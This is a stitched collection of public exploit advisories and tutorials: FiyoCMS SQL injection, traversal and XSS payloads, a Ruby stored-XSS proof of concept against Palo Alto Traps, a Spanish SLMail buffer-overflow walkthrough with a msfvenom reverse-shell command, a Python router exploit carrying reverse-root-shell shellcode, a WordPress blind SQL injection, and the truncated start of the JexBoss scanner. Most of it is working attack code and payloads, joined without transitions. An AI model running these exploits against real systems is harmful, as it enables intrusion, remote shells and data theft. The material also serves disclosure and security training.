    Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT

--------------------------------------------------------------------
Directory Traversal - kcfinder plugins - CVE-2014-1222
--------------------------------------------------------------------

FiyoCMS was identified to be using an outdated KCFinder plugin which vulnerable to directory traversal attack.

POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.248.132
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.248.132/fiyo//plugins/plg_kcfinder/browse.php?type=files
Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

dir=files&file=../../../../../../../etc/passwd

----------------------------------------------------
Reflected XSS  - CVE-2014-9146
----------------------------------------------------

http://192.168.248.132/fiyo/?app=article&view=item31ab2"><script>alert(1)</script>0ccba&id=186
http://192.168.248.132/fiyo/?app=article&view=item&id=18690fdb"><script>alert(1)</script>d99c9
http://192.168.248.132/fiyo/?page=5eac15eac1"><script>alert(1)</script>774f2
http://192.168.248.132/fiyo/?app=article95ce1"><script>alert(1)</script>298ab&view=item&id=186
http://192.168.248.132/fiyo/dapur/index.php?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5


----------------------------------------------------
Direct URL Access - CVE-2014-9147
----------------------------------------------------
To download database backup without any authentications required.
http://192.168.248.132/fiyo/.backup/[db_backup.sql filename]

----------------------------------------------------
Access Control Bypass - CVE-2014-9148
----------------------------------------------------

To access super administrator functions "Install & Update" and "Backup" by administrator user, just go directly to the URL below:
  1. http://192.168.248.132/fiyo/dapur/?app=config&view=backup
  2. http://192.168.248.132/fiyo/dapur/?app=config&view=install
HireHackking 
#!/usr/bin/ruby
=begin
------------------------------------------------------------------------
Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)
Vendor: Palo Alto Networks
Vulnerable Version(s): 3.1.2.1546
Tested Version: 3.1.2.1546
Advisory Publication: 29 March 2015 
Vendor Notification: 17 October 2014 
Vulnerability Type: Stored Cross Site Scripting 
CVE Reference: CVE-2015-2223
Risk Level: High
Solution Status: 
Discovered and Provided: Michael Hendrickx, help AG
------------------------------------------------------------------------

About the product:
Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc.  Aside from optionally blocking it, it sends this “trap” to a central server for logging purposes.

About the vulnerability:
An attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database.  When an administrator monitors the Traps’ admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.

The XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:

  <b:Arguments>"C:\\Users\\Michael\\fake.exe" 
    <script>
      alert("xss");
    </script>
  </b:Arguments>

A POC script can be found at the following URL:
https://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb

------------------------------------------------------------------------

Solution:

The vendor was notified back in October 2014, and a we’ve sent a few follow ups since.  Contact the vendor for the patch details.  

References:

[1] help AG middle East: http://www.helpag.com/ 
[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html 
------------------------------------------------------------------------
=end

# PA traps fuzzer? :)

require 'net/http'

def usage
	puts "pa_traps.rb <trapserver>"
	exit
end

usage if ARGV.empty?

# get the arguments
traps = {}
traps[:server] = ARGV[0]
traps[:port] = 2125

http_headers = {
	"Content-Type" => "application/soap+xml; charset=utf-8", 
	"Expect" => "100-continue",
	"Connection" => "Keep-Alive"
}

soap_envelope = <<-SOAP
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
	<s:Header>
		<a:Action s:mustUnderstand="1">http://tempuri.org/IClientServices/SendPreventions</a:Action>
		<a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>
		<a:ReplyTo>
			<a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>
		</a:ReplyTo>
		<a:To s:mustUnderstand="1">http://10.13.6.82:2125/CyveraServer/</a:To>
	</s:Header>
	<s:Body>
		<SendPreventions xmlns="http://tempuri.org/">
			<machine>VMNAME1</machine>
			<preventions xmlns:b="http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
				<b:PreventionDetails>
					<b:Id>0</b:Id>
					<b:MachineName>AEDXBNB-MHE</b:MachineName>
					<b:Message>Exploit attempt was prevented by Traps</b:Message>
					<b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>
					<b:ProcessName>Excel.exe</b:ProcessName>
					<b:Time>2014-10-15T13:18:56</b:Time>
					<b:UserName> HELPAG\\hendrickx </b:UserName>
					<b:Arguments>"C:\\Users\\Michael\\fake.exe" 
						&#0000060;script&#0000062;
							alert("xss");
						&#0000060;/script&#0000062;
					</b:Arguments>
					<b:CyveraCode>EXEPROT</b:CyveraCode>
					<b:CyveraInternalCode i:nil="true"/>
					<b:CyveraVersion>3.1.2.1546</b:CyveraVersion>
					<b:FileName>
						&#0000060;script&#0000062;
							alert("xss");
						&#0000060;/script&#0000062;
					</b:FileName>
					<b:PreventionMode>Notify</b:PreventionMode>
					<b:ProcessHash i:nil="true"/>
					<b:ProcessVersion>1.12.1.0</b:ProcessVersion>
					<b:Sent>false</b:Sent>
					<b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>
					<b:Source>Unknown</b:Source>
					<b:Status i:nil="true"/>
					<b:URL>
						&#0000060;script&#0000062;
							alert("xss in URL");
						&#0000060;/script&#0000062;
					</b:URL>
				</b:PreventionDetails>
			</preventions>
		</SendPreventions>
	</s:Body>
</s:Envelope>
SOAP

if traps[:server].empty?
	puts "Need a traps server"
	usage
end

# summary
puts "Testing #{traps[:server]}"

Net::HTTP.start(traps[:server], traps[:port]) do |http|
	r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);
	puts r1
	puts r1.inspect
end
HireHackking

En este post vamos a estar explotando el servicio SLMail de versión 5.5 el cual es vulnerable a un Buffer Overflow en el campo PASS:

image 65

Aunque ya haya scripts que automaticen la explotación, nosotros vamos a hacerlo de forma manual.

Antes que nada, es recomendable haber leído el post de Fundamentos de Buffer Overflow si nunca has ejecutado este tipo de ataque.

Vamos a estar trabajando con nuestro Kali y un Windows 7 de 32 bits.

  • Índice:
    • Introducción
    • Fuzzing
    • Tomando el control del EIP
    • Averiguando badchars
    • Crear payload con msfvenom
    • Buscando dirección con opcode JMP ESP
    • Exploit final

Introducción

Lo primero de todo es descargar e instalar el servicio «SLMail» en el Windows 7, previo a esto tenemos que asegurarnos que nuestro Windows 7 tiene desactivado el DEP y que el firewall no nos bloquee, al menos los puertos 25 y 110.

  • El firewall podemos configurarlo usando «Windows Firewall con Seguridad Avanzada» o netsh. Este último, podemos ver como hacerlo en el post de pivoting netsh.
  • Y el DEP (Data Execution Prevention) podemos deshabilitarlo desde una terminal como administrador usando el comando:
    • bcdedit.exe /set nx AlwaysOff

Podemos descargar SLMail 5.5 desde su web oficial. Una vez lo descargamos, empezamos el proceso de instalación:

image 66

En este caso no hace falta tocar nada, con darle todo a «Siguiente» es suficiente. Cuando la instalación acabe reiniciaremos el equipo y listo. Tendremos el SLMail instalado.

Cuando se inicie el equipo abrimos el SLMail como administrador:

image 67

Y nos dirigimos a la pestaña de control:

image 68

Desde esta parte es donde podemos controlar si se pausa el servicio o se inicia, nos servirá para cuando se crashee al ocasionar el buffer overflow. Como vemos ahora mismo ya está iniciado, por lo que si vamos a nuestro kali, podremos ver los puertos 25 y 110 abiertos:

image 69

Con todo el servicio instalado, ejecutándose y expuesto, ya podemos ponernos con el buffer overflow.

En este caso en particular, ya hemos identificado y ya conocemos de forma previa que el servicio es vulnerable. Además, hemos visto en searchsploit que ya hay scripts que lo explotan automáticamente. Por lo que vamos a ayudarnos de alguno de estos scripts para identificar la manera.

En cualquier otro caso, cuando no sepamos de qué servicio se trata y no sepamos casi nada, la mejor opción es simplemente conectarnos al puerto mediante netcat o telnet y ver si nos responde de alguna forma, y a partir de ahí, ver que se puede hacer.

Dicho esto, vamos a echarle un vistazo al primer script de searchsploit:

image 70

El título ya nos adelanta que el parámetro vulnerable parece ser ‘PASS’

Echando un ojo al primer script, vemos como sería el procedimiento:

image 71

El parámetro PASS parece ser el campo de la contraseña de un login. Además, si nos fijamos, vemos que de los dos puertos que usa SLMail, el 25 y el 110. Se conecta al 110, por lo que también identificamos a cuál de los dos puertos conectarnos.

Vamos a probarlo de forma manual:

image 72

Parece que son válidos ambos campos, aunque nos digan que las credenciales son incorrectas.

En este punto ya tenemos lo necesario para empezar:

  • Servicio vulnerable detectado
  • Puerto al que conectarnos
  • Parámetro vulnerable

Fuzzing

Sabiendo todo esto, es la hora de hacer Fuzzing, es decir, tenemos que averiguar que cantidad de información hace falta en el parámetro PASS para que se ocasione el Buffer Overflow y el programa corrompa.

Antes de hacer fuzzing, en el Windows 7 vamos a abrir como administrador el Immunity Debugger para adjuntarnos al proceso del SLMail:

image 73
image 74

De esta forma ya habremos adjuntado el Immunity Debugger al proceso de SLMail:

image 75

Ojo, cuando nos juntamos con Immunity a un proceso, este se pausa, lo podemos ver abajo a la derecha:

image 76

Por lo que no olvidemos nunca, reanudar el proceso:

image 77
image 78

Con esto hecho, ahora para hacer fuzzing vamos a hacer uso de un script en python, el cual nos automatiza la tarea:

#!/usr/bin/python

from pwn import *
import socket, sys

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Variables globales
ip_address = sys.argv[1]
rport = 9999

if __name__ == '__main__':

    buffer = ["A"]
    contador = 100

    while len(buffer) < 32:
        buffer.append("A"*contador)
        contador += 100

    p1 = log.progress("Data")

    for strings in buffer:

        try:
            p1.status("Enviando %s bytes" % len(strings))

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip_address, rport))
            data = s.recv(1024)


            s.send("%s" % strings)
            data = s.recv(1024)

        except:

            print "\n[!] Ha habido un error de conexion\n"
            sys.exit(1)

Éste es el script estándar, solo tenemos que adaptarlo para que se adecue al caso que necesitamos:

#!/usr/bin/python

from pwn import *
import socket, sys

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Variables globales
ip_address = sys.argv[1]
rport = <puerto>

if __name__ == '__main__':

    buffer = ["A"]
    contador = 150

    while len(buffer) < 32:
        buffer.append("A"*contador)
        contador += 150

    p1 = log.progress("Data")

    for strings in buffer:

        try:
            p1.status("Enviando %s bytes" % len(strings))

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip_address, rport))
            data = s.recv(1024)

            s.send("USER prueba\n\r")
            data = s.recv(1024)

            s.send("PASS %s\n\r" % strings)
            data = s.recv(1024)

        except:

            print "\n[!] Ha habido un error de conexion\n"
            sys.exit(1)

Cuando mandamos el USER y el PASS, colocando \n\r al final. Estamos simulando que presionamos la tecla enter

El uso del script es sencillo, simplemente le tenemos que especificar una IP, además de editar el puerto en el código:

image 79
image 80

Con el puerto cambiado, vamos a ejecutar el script apuntando al Windows 7:

image 81
image 82
image 83

Cuando se quede pillado el número de bytes, nos volvemos al immunity debugger (o también podemos ver como se comporta el immunity mientras recibe los bytes):

image 84
image 85
image 86

Como vemos el estado del programa es «Paused», por lo que el programa a crasheado. Además, podemos como se han quedado los registros.

Si nos fijamos en los campos del EBP y del EIP, vemos como el valor de los 4 bytes es \x41 (este es el formato para representar el hexadecimal, con \x como prefijo).

image 87

Para quien no lo sepa, 41 es la letra A en hexadecimal. Que es exactamente lo que nosotros le estamos enviando.

image 88
image 89

¿Qué significa esto?

Básicamente, imaginémonos que el servicio como mucho esperaba en el campo «PASS», un valor máximo de 30 caracteres (que no es el caso, es bastante más).

¿Qué pasaría si nosotros le mandamos 60 caracteres?

Ocurre entonces que la memoria que tiene el programa reservado para ese campo es bastante menor que los datos recibidos, por lo que esa diferencia de 30 (60 – 30) se tiene que ir hacia algún lado. Y es aquí donde se empieza a sobrescribir registros.

La idea básicamente es esta:

image 90

Teniendo esto claro, y viendo como hemos sobrescrito el EIP y el EBP, la idea ahora es tomar el control del EIP, es decir, determinar exactamente cuantas ‘A‘ tenemos que mandar antes de empezar a sobrescribirlo.

Este registro nos importa tanto, ya que es la dirección de la próxima instrucción del programa, por eso se llama EIP (Extended Instruction Pointer).

Por esta misma razón el programa crashea, ya que al estar sobrescribiendo este registro, cuando el programa va a seguir su flujo, lo que hace es ver a que dirección apunta el EIP, y claro, si la dirección a la que apunta es 0x41414141, pues no llega a ningún sitio, ya que no es una dirección de memoria válida. Por eso el programa se corrompe.

Tomando el control del EIP

Con todo esto claro, para determinar el offset del EIP, o dicho de otra forma, cuantas ‘A‘ hacen falta hasta sobrescribirlo, vamos a hacer uso de dos herramientas de metasploit (en un examen como el OSCP es totalmente válido usar estas dos herramientas):

  • pattern_create.rb
  • pattern_offset.rb

Asegurándonos de que tenemos metasploit instalado, podemos encontrar estas dos herramientas de la siguiente forma:

image 91

Primero vamos a usar pattern_create.rb, lo que nos permite esta herramienta es crear una cadena de la longitud que nosotros indiquemos. Esta cadena está especialmente diseñada para que no haya patrones repetidos.

Antes, hemos comprobado que con 2700 bytes ya conseguíamos además de corromper el programa, sobrescribir los registros. Por lo que ahora vamos a cambiar un poco el script para directamente mandar solo un payload. El modelo del script a usar, sería el siguiente:

#!/usr/bin/python

from pwn import *
import socket, sys
from struct import pack

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Variables globales
ip_address = sys.argv[1]
rport = 9999

shellcode_windows=()

shellcode_linux=()

if __name__ == '__main__':

    p1 = log.progress("Data")

    payload = <payload>

    try:
        p1.status("Enviando payload")

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip_address, rport))
        data = s.recv(1024)


        s.send(payload + '\r\n')
        data = s.recv(1024)


    except:

        print "\n[!] Ha habido un error de conexion\n"
        sys.exit(1)

De nuevo, simplemente lo copiamos y lo adaptamos a lo que necesitemos:

#!/usr/bin/python

from pwn import *
import socket, sys
from struct import pack

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Variables globales
ip_address = sys.argv[1]
rport = 110

shellcode_windows=()

shellcode_linux=()

if __name__ == '__main__':

    p1 = log.progress("Data")

    payload = <payload>

    try:
        p1.status("Enviando payload")

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip_address, rport))
        data = s.recv(1024)


        s.send('USER prueba\r\n')
        data = s.recv(1024)

        s.send('PASS ' + payload + '\r\n')
        data = s.recv(1024)

    except:

        print "\n[!] Ha habido un error de conexion\n"
        sys.exit(1)

Con esto, vamos a generar ahora una cadena de 2700 bytes con pattern_create.rb:

pattern_create.rb -l <longitud de la cadena>

image 92

Copiamos este output y lo adjuntamos a la variable payload del script:

image 93

De esta forma, vamos a ejecutar el script para que mande directamente este payload al campo «PASS».

Cada vez que ocasionemos un buffer overflow y el programa corrompa, tenemos que reiniciar el servicio y volvernos a adjuntarnos con immunity debugger a él, ya que al reiniciar el servicio el proceso cambia.

Ejecutamos el exploit:

image 94

En immunity podemos ver como el programa corrompe:

image 95

Con esto hecho, la idea ahora es fijarnos en el valor del registro EIP:

image 96

Es 39694438. Este valor corresponde a una parte en concreto de la cadena que hemos enviado en el payload.

Teniendo en cuenta este número, vamos a usar pattern_offset.rb:

pattern_offset.rb -q <valor del EIP>

image 97

Ojo, nos dice que el offset es 2606, es decir que si mandamos 2606 ‘A‘ y 4 ‘B‘, el valor del EIP debería de ser 42424242 (ya que 42 es B en hexadecimal).

Vamos a comprobarlo:

image 98

<Reiniciamos el servicio>

<Nos adjuntamos con Immunity Debugger>

Ejecutamos el exploit:

image 99
image 100

Como vemos, EIP vale las 4 ‘B‘ que hemos mandado. Es en este punto cuando se dice que tenemos el control del EIP.

Averiguando badchars

Ahora, es hora de averiguar los «badchars». Los badchars son bytes que por así decirlo el programa no admite. De tal forma que si generásemos un payload con algún badchar, no funcionaría.

Para este paso, vamos a hacer uso de mona, un módulo de Immunity Debugger que nos facilitará la tarea.

Su instalación es bastante sencilla, descargamos el script mona.py de su repositorio oficial. Este script lo movemos a la siguiente ruta:

C:\\Archivos de programa\\Immunity Inc\\Immunity Debugger\\PyCommands

C:\\Program Files\\Immunity Inc\\Immunity Debugger\\PyCommands

Y de esta forma ya se habrá instalado. Podemos comprobarlo en el Immunity Debugger con !mona:

image 101

Hecho esto, vamos a configurar el espacio de trabajo con el comando:

!mona config -set workingfolder <ruta>\%p

image 102

Ahora, vamos a generar un array de bytes de la siguiente forma:

!mona bytearray

image 103

Esto nos genera una cadena con todos los bytes posibles, nos servirá para determinar cuáles son badchars y cuáles no.

Además, con este comando como hemos configurado el espacio de trabajo previamente, ahora se nos habrá generado una carpeta con el nombre del proceso al que estamos adjuntados:

image 104

Dentro, podemos encontrar un txt con la cadena de bytes:

image 105
image 106

Nos copiamos la cadena y la añadimos al payload.

image 107

Con esto, hacemos lo de siempre, reiniciamos el servicio, nos adjuntamos con Immunity y ejecutamos el exploit:

image 108
image 109

Ahora nos interesa el valor del ESP. Mediante este valor, mona nos automatizará la tarea de detectar los badchars.

Haremos uso del siguiente comando:

!mona compare -f <especificamos la ruta del bytearray.bin> -a <dirección del ESP>

!mona compare -f C:\\Users\\JuanA\\Desktop\\SLMail\\bytearray.bin -a 0258A128

image 110

De esta forma, como vemos, mona nos dice que un badchars es el \x00 (este es un badchar muy típico, por lo que normalmente se quita de inmediato)

Con esto hecho, vamos a actualizar los archivos bytearray que tenemos, para decirles que eliminen el \x00:

!mona bytearray -cpb '"<badchars>"'

!mona bytearray -cpb '"\x00"'

image 111

De esta forma, el archivo bytearray se habrá actualizado.

image 139

Como ya sabemos que \x00 es un badchar, simplemente lo quitaremos del payload en el exploit:

image 112

Ejecutamos el exploit…

image 113

Y ahora hacemos el mismo proceso para detectar el badchar:

!mona compare -f <especificamos la ruta del bytearray.bin> -a <dirección del ESP>

!mona compare -f C:\\Users\\JuanA\\Desktop\\SLMail\\bytearray.bin -a 01ADA128

image 114

Nos detecta que el \x0a es otro. Pues hacemos lo mismo que antes:

!mona bytearray -cpb '"<badchars>"'

!mona bytearray -cpb '"\\x00\\x0a"'

image 115

Comprobamos que se ha quitado:

image 116

Y con esto, lo mismo que antes, ahora quitamos del payload el \x0a.

image 117

Y repetimos de nuevo todo el proceso, esta parte es un poco repetitiva.

image 118
image 119

!mona compare -f <especificamos la ruta del bytearray.bin> -a <dirección del ESP>

!mona compare -f C:\\Users\\JuanA\\Desktop\\SLMail\\bytearray.bin -a 026EA128

image 120

Detectamos otro badchar, esta vez el \x0d. Pues hacemos lo mismo:

!mona bytearray -cpb '"<badchars>"'

!mona bytearray -cpb '"\\x00\\x0a\\x0d"'

image 121

Y pues lo mismo, quitamos ahora del exploit el \x0d y repetimos todo. Así, hasta que nos salga que no encuentra ninguno:

image 122

Por lo que ya hemos descubierto todos los badchars, en este caso son:

  • \x00
  • \x0a
  • \x0d

Crear payload con msfvenom

Sabiendo esto, vamos a crear el payload de la reverse shell con msfvenom (podemos usar cualquier otro payload, por ejemplo, el de ejecutar un comando concreto en Windows):

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<puerto> EXITFUNC=thread -a x86 --platform windows -b <badchars> -e x86/shikata_ga_nai -f c

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.208.10 LPORT=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f c

image 123

Usamos el EXITFUNC=thread porque si no cuando consigamos explotar el buffer overflow y tengamos una shell. Si la perdiéramos por lo que sea y quisiéramos conseguir otra no podríamos, porque ya se habrá cargado el proceso. De esta forma podemos mandarnos cuantas shells queramos, ya que el proceso de las shells se ejecutan como thread y no sustituyen al principal del servicio

Nos copiamos el shellcode generado por msfvenom y lo añadimos al exploit:

image 124
image 125

Buscando dirección con opcode JMP ESP

Con esta parte hecha, solo falta un último paso. Tenemos que conseguir que el EIP apunte al ESP, es decir, a nuestro payload, ya que ahora mismo está apuntando a la dirección de 4 ‘B‘.

Para esto, tenemos que hacer que el EIP apunte a una dirección de «JMP ESP». Una dirección la cual haga un salto automático a donde se encuentre el ESP.

Para hacer esto, vamos a usar la herramienta nasm_shell.rb de metasploit y mona.

Nasm_shell.rb hace lo siguiente:

image 126

De esta forma, vamos a ver el opcode asociado al JMP ESP:

image 127
image 128

Sabiendo que el opcode es FFE4, vamos a dirigirnos a mona y vamos a listar los módulos del proceso:

!mona modules

image 129

Listando los módulos, tenemos que usar uno que tenga las cuatro primeras columnas de True y False, en False (ya que este BoF no tiene ninguna protección). En mi caso voy a usar el siguiente módulo:

image 130

Con esto, ahora vamos a usar mona para buscar una dirección dentro de ese módulo cuyo opcode sea un JMP ESP:

!mona find -s '"<opcode JMP ESP>"' -m <módulo>

!mona find -s '"\\xff\\xe4"' -m SLMFC.dll

image 131

Mona nos da una serie de direcciones, podemos escoger cualquiera. El único requisito es que esa dirección no contenga ningún badchar.

En mi caso, voy a escoger por ejemplo la última, 0x5f4c4d13.

Vamos a comprobar que efectivamente esta dirección es un jmp ESP.

Click derecho y nos copiamos la dirección:

image 132

Nos dirigimos al siguiente botón:

image 133

Pegamos la dirección y le damos al OK. De esta forma nos llevará a la dirección que hemos especificado:

image 134

Y efectivamente, confirmamos que es un JMP ESP.

En caso de que al hacer esto nos lleve a una dirección que no tiene nada que ver con la que hemos puesto, simplemente buscamos otra vez y listo.

Exploit final

Ya tenemos todo para explotar el buffer overflow de forma exitosa. Vamos a dirigirnos al exploit.py para hacer los últimos retoques:

image 135

Vamos a sustituir las 4 ‘B’ con la dirección del JMP ESP en Little Endian:

image 136

En este caso usamos la librería struct para que nos haga el cambio a «Little Endian» de forma automática. También sería válido si lo hiciésemos nosotros de manera manual.

Además, para asegurarnos de que todo vaya correcto, vamos a añadirle NOPS entre el JMP ESP y el shellcode (también podriamos ocasionar un desplazamiento de la pila si no quisiéramos usar NOPS):

image 137

Si no sabes lo que son los NOPS, lo puedes ver en el post de Fundamentos para Stack Based Buffer Overflow.

De esta forma, ya está todo listo, si nos ponemos en escucha por el puerto que especificamos anteriormente en el msfvenom y ejecutamos el exploit:

image 138

Conseguimos controlar el flujo del programa haciendo que se dirija a nuestro payload y que nos ejecute una shell.

HireHackking 
#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT 
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################

import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib





if __name__ == '__main__':
	



	try:
		ip = sys.argv[1]
		revhost = sys.argv[2]
		revport = sys.argv[3]
	except:
		print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]

	host = struct.unpack('>L',socket.inet_aton(revhost))[0]	
	port = string.atoi(revport)


	shellcode = ""
	shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
	shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
	shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
	shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
	shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
	shellcode += "\xaf\xae\xff\xe4"
	shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
	shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
	shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
	shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
	shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
	shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
	shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
	shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
	shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
	shellcode += "\x01\x01\x01\x0c"


	data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" 
	data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" 
	data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48

	pdata = {
		'redirect'		: data,
		'self'			: '1',
		'user'			: 'tanri',
		'password'		: 'ihtiyacmyok',
		'gonder'		: 'TAMAM'
		}

	login_data = urllib.urlencode(pdata)
	#print login_data

	url = 'http://%s/cgi-bin/login' % ip
	header = {}
	req = urllib2.Request(url, login_data, header)
	rsp = urllib2.urlopen(req)
HireHackking 
# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: version 2.5.3 and previous version
# Tested on: Chrome (It's PHP Application)
# CVE : N/A


# Timeline #
[2015.03.05] Reported to the Vendor
[2015.03.06?] Fixed in Update 2.5.4

 
# Details #

- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.
- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- "pid" variable is not sanitized


# Vulnerable code #

Line 1132:        echo '<div id="dlg_cdm_thumbnails">';
Line 1133:        if ($_GET['pid'] != "") {
Line 1134:            $r_current_project = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project  WHERE id = " . $_GET['pid'] . "", ARRAY_A);
Line 1135:        }


# POC #
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]

example:
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)

if yes it will sleep 5 seconds.


This vulnerable parameters must trance to integer
HireHackking 
# coding: utf-8
# JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com)
# Updates: https://github.com/joaomatosf/jexboss
# Free for distribution and modification, but the authorship should be preserved.


import httplib, sys, urllib, os, time
from urllib import urlencode

RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'

def getHost(url):
	tokens = url.split("://")
	if len(tokens) == 2: #foi fornecido protocolo
		return tokens[1].split(":")[0]
	else:
		return tokens.split(":")[0]
		
def getProtocol(url):
	tokens = url.split("://")
	if tokens[0] == "https":
		return "https"
	else:
		return "http"

def getPort(url):
	token = url[6:].split(":")
	if len(token) == 2:
		return token[1]
	elif getProtocol(url) == "https":
		return 443
	else:
		return 80
		
def getConnection(url):
	if getProtocol(url) == "https":
		return httplib.HTTPSConnection(getHost(url), getPort(url))
	else:
		return httplib.HTTPConnection(getHost(url), getPort(url))
		

def getSuccessfully(url, path):
		result = 404
		time.sleep(5)
		conn = getConnection(url)
		conn.request("GET", path)
		result = conn.getresponse().status
		if result == 404:
			conn.close()
			time.sleep(7)
			conn = getConnection(url)
			conn.request("GET", path)
			result = conn.getresponse().status
			conn.close()
		return result

def checkVul(url):
	
	print ( GREEN +" ** Checking Host: %s **\n" %url )
	
	path = { "jmx-console"		 : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
			 "web-console" 		 : "/web-console/ServerInfo.jsp",
			 "JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}

	for i in path.keys():
		try:
			print GREEN + " * Checking %s: \t" %i + ENDC,
			conn = getConnection(url)
			conn.request("HEAD", path[i])
			path[i] = conn.getresponse().status
			if path[i] == 200 or path[i] == 500:
				print RED + "[ VULNERABLE ]" + ENDC
			else: print GREEN + "[ OK ]"
			conn.close()
		except:
			print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC
			path[i] = 505
		
	return path

def autoExploit(url, type):
	
	# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5
	# exploitJmxConsoleMainDeploy:	   tested and working in jboss 4 and 6
